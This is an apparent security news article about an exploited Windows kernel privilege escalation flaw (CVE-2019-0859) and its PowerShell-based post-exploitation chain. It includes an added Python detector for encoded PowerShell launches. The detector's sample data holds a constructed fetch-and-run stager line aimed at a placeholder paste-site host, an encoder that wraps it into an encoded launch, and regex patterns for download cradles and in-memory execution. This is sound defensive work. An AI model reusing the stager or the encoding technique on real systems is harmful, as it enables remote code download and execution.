Kaspersky Lab has detected a zero-day vulnerability in Microsoft Windows. Investigating the event, its researchers traced the exploit to a flaw in win32k.sys. This is the fifth exploited local privilege escalation vulnerability in Windows that Kaspersky Lab has discovered since October.
The vulnerability was reported on 17th March; it was patched along with 60+ other vulnerabilities.
Kaspersky Lab researchers Vasiliy Berdnikov and Boris Larin observed the bug on 64-bit versions of Windows 7 through Windows 10. The attack went straight for the kernel of the targeted system, installing a backdoor built from a core component of the Windows operating system.
After a successful exploit, the attacker can launch PowerShell with a Base64-encoded command. That command downloads a script from a third-party website such as pastebin. The downloaded PowerShell script then runs another script, and the final script unpacks shellcode, allocates executable memory, and runs the code. The primary goal is to deliver a backdoor and take over the targeted machine.
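The post-exploitation chain described above (an encoded PowerShell launch, a download from a paste site, a second stage run in memory) leaves a recognisable footprint in process-creation logs. The following detector is an added example written for this page, not Kaspersky's or Microsoft's code: it decodes `-EncodedCommand` arguments (Base64 over UTF-16LE), strips the blob so random letter runs inside it cannot trip the patterns, and scores the visible flags plus the decoded script against the behaviours the write-up names. The log lines, hosts, timestamps and the `pastebin.example` URL are constructed placeholders.

```python
"""Flag Base64-encoded PowerShell launches and download cradles in process-creation logs.

Added example, not Kaspersky's or Microsoft's code.  The log lines below are
constructed to mimic the CommandLine field of a process-creation event; the
hosts, timestamps and the pastebin.example URL are placeholders.
"""
import base64
import re

# -EncodedCommand and the prefixes PowerShell accepts for it (-e, -ec, -en, -enc).
ENCODED_FLAG = re.compile(
    r"""(?i)(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+["']?([A-Za-z0-9+/=]+)"""
)

# Behaviours described in the write-up: fetch from a paste site, run the
# result, unpack a second Base64 stage, allocate executable memory.
INDICATORS = {
    "download_cradle": re.compile(r"(?i)downloadstring|downloadfile|invoke-webrequest|net\.webclient"),
    "paste_site": re.compile(r"(?i)pastebin"),
    "invoke_expression": re.compile(r"(?i)\biex\b|invoke-expression"),
    "nested_base64": re.compile(r"(?i)frombase64string"),
    "memory_alloc": re.compile(r"(?i)virtualalloc|createthread"),
    "hidden_window": re.compile(r"(?i)-w(?:indowstyle)?\s+hidden|-nop\b|-noprofile"),
}

LOG_LINE = re.compile(r"^(\S+)\s+(\S+)\s+CommandLine:\s+(.*)$")


def encode_powershell(script: str) -> str:
    """PowerShell's -EncodedCommand takes Base64 over the UTF-16LE script text."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_blob(blob: str):
    """Reverse encode_powershell; return None if the blob is not valid UTF-16LE Base64."""
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def classify(cmdline: str) -> dict:
    """Decode any encoded command, then match indicators on the visible flags plus the decoded script."""
    m = ENCODED_FLAG.search(cmdline)
    decoded = decode_blob(m.group(1)) if m else None
    # Drop the Base64 blob itself so letter runs inside it cannot produce false hits.
    visible = cmdline[:m.start(1)] + cmdline[m.end(1):] if m else cmdline
    text = visible + " " + (decoded or "")
    hits = sorted(name for name, rx in INDICATORS.items() if rx.search(text))
    return {
        "encoded": m is not None,
        "decoded": decoded,
        "indicators": hits,
        # A fetch-and-run or memory-allocation stage is enough on its own;
        # otherwise require two weaker signals together.
        "suspicious": "download_cradle" in hits or "memory_alloc" in hits or len(hits) >= 2,
    }


def analyze_logs(lines):
    """Parse constructed process-creation lines and classify each command line."""
    results = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue
        ts, host, cmdline = m.groups()
        results.append({"time": ts, "host": host, "cmdline": cmdline, **classify(cmdline)})
    return results


# Constructed samples.  STAGER_SCRIPT has the shape of the fetch-and-run stage
# the write-up describes, pointed at a placeholder URL.
BENIGN_SCRIPT = "Get-Service | Where-Object Status -eq 'Running'"
STAGER_SCRIPT = (
    "$s=(New-Object Net.WebClient).DownloadString('https://pastebin.example/raw/PLACEHOLDER');"
    "Invoke-Expression $s"
)
SAMPLE_LOGS = [
    '2019-04-10T09:12:01Z WS01 CommandLine: powershell.exe -NoProfile -Command "Get-Date"',
    "2019-04-10T09:15:22Z WS01 CommandLine: powershell.exe -enc " + encode_powershell(BENIGN_SCRIPT),
    "2019-04-10T09:17:40Z WS02 CommandLine: powershell.exe -nop -w hidden -enc " + encode_powershell(STAGER_SCRIPT),
    "2019-04-10T09:18:05Z WS02 CommandLine: powershell.exe -e not_base64!!",
]

if __name__ == "__main__":
    for r in analyze_logs(SAMPLE_LOGS):
        flag = "SUSPICIOUS" if r["suspicious"] else "ok"
        print(f"{r['time']} {r['host']} {flag} encoded={r['encoded']} indicators={r['indicators']}")
        if r["decoded"]:
            print("    decoded:", r["decoded"])
```

The fourth sample shows the failure mode worth keeping in mind: an `-e` argument that is not valid Base64 is still reported as an encoded launch, but with `decoded` set to `None`, so a malformed or truncated blob is not silently treated as benign. Encoded launches alone are common in legitimate administration, which is why only the decoded content (a download cradle, a memory allocation stage, or several weaker signals together) raises the verdict to suspicious.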
“This allows you to escalate privilege and get the same privileges the system has. It’s the highest level of privilege you can have,” Larin says.
Zero-day exploits are not available to the general public; only advanced actors use them.
Microsoft investigated CVE-2019-0859 and confirmed that a successful attack could run malicious code in kernel mode and take over the targeted machine, allowing an attacker to manipulate data on it.
Cybercriminals are increasingly using PowerShell-based malware in their attacks. It is a popular choice because it simplifies the concealment of illicit activity.